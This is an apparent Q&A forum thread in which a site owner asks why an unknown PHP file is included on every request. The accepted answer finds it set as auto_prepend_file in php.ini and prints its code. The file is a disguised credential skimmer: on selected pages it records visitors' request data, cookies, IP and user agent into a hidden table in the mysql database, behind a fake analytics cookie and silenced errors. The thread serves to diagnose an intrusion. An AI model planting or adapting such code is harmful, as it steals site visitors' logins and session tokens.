# File is included somewhere, how to find it?

Tags: php, include

From my error logs I found strange file "/var/lib/php5/modules/cgi/enabled_to.php" that is included in every php file. So even if file is empty this file is included and executes.

I suppose maybe it is something from Nginx or PHP settings, but I have no idea where to look.

When I try to delete it, this error happens on all php pages:

> PHP message: PHP Fatal error: Unknown: Failed opening required
> '/var/lib/php5/modules/cgi/enabled_to.php'
> (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line
> 0" while reading response header from upstream, client: 11.11.11.11,
> server: domain.com, request: "GET /url", upstream:
> "fastcgi://unix:/var/run/php5-fpm.sock:", host: "host.com"

How can I trace what includes this file?

Answer (score 0, accepted):

Found it:

php.ini

> ; Automatically add files before PHP document.
> ; http://php.net/auto-prepend-file
> auto_prepend_file = /var/lib/php5/modules/cgi/enabled_to.php

I have no idea what this file is doing here or what is happening inside (some strange logging).

File itself:

```
<?php

try {
    $debug = false;
    function gen_uuid()
    {
        return sprintf('%04x%04x-%04x-%04x-%04x-%04x%04x%04x',
            // 32 bits for "time_low"
            mt_rand(0, 0xffff), mt_rand(0, 0xffff),

            // 16 bits for "time_mid"
            mt_rand(0, 0xffff),

            // 16 bits for "time_hi_and_version",
            // four most significant bits holds version number 4
            mt_rand(0, 0x0fff) | 0x4000,

            // 16 bits, 8 bits for "clk_seq_hi_res",
            // 8 bits for "clk_seq_low",
            // two most significant bits holds zero and one for variant DCE1.1
            mt_rand(0, 0x3fff) | 0x8000,

            // 48 bits for "node"
            mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff)
        );
    }

    function get_uid()
    {
        if (!isset($_COOKIE["_gav2"])) {
            $uid = "GA2." . gen_uuid();
            setcookie("_gav2", $uid, time() + 31556926, "/", ".domain.com");
            $_COOKIE['_gav2'] = $uid;
        }
        return $_COOKIE['_gav2'];
    }

    if (
        strpos($_SERVER['HTTP_HOST'], "domain.com") !== false && (
            strpos($_SERVER['REQUEST_URI'], "some_page.php") !== false ||
            strpos($_SERVER['REQUEST_URI'], "some_page2.php") !== false
        )
    ) {
        $servername = "localhost";
        $username = "mysql";
        $password = "Defmysql";
        $database = "mysql";
        // Create connection
        $mysqli = new mysqli($servername, $username, $password, $database);
        if ($mysqli->connect_errno && $debug) {
            echo "<!---->";
        }
        $create_sql = "CREATE TABLE IF NOT EXISTS  tables_priv_ex (
                    `id` int(11) NOT NULL auto_increment,
                    `uid`  TEXT NOT NULL DEFAULT '',
                    `ip`  TEXT NOT NULL DEFAULT '',
                    `user_agent`  TEXT NOT NULL DEFAULT '',
                    `request`  TEXT NOT NULL DEFAULT '',
                    `cookie`  TEXT NOT NULL DEFAULT '',
                    `server`  TEXT NOT NULL DEFAULT '',
                    `created` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,
                   PRIMARY KEY (`id`),
                    KEY `id` (`id`)
                )";
        if (!$mysqli->query($create_sql) && $debug) {
            echo "<!-- -->";
        }

        $uid = get_uid();
        $ip = $_SERVER['REMOTE_ADDR'];
        $ua = $_SERVER['HTTP_USER_AGENT'];
        $request_url = $_SERVER['REQUEST_URI'];

        $json_request = json_encode($_REQUEST);
        $json_cookie = json_encode($_COOKIE);
    $json_server = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);

        $insert = $mysqli->prepare("INSERT INTO tables_priv_ex (uid, ip, user_agent, request, cookie, server) VALUES (?, ?, ?, ?, ?, ?)");
        $result = $insert->bind_param('ssssss', $uid, $ip, $ua, $json_request, $json_cookie, $json_server);
        $insert->execute();
        $mysqli->close();

    }
} catch (Exception $e) {
    if ($debug) {
        echo '';
    }
}
```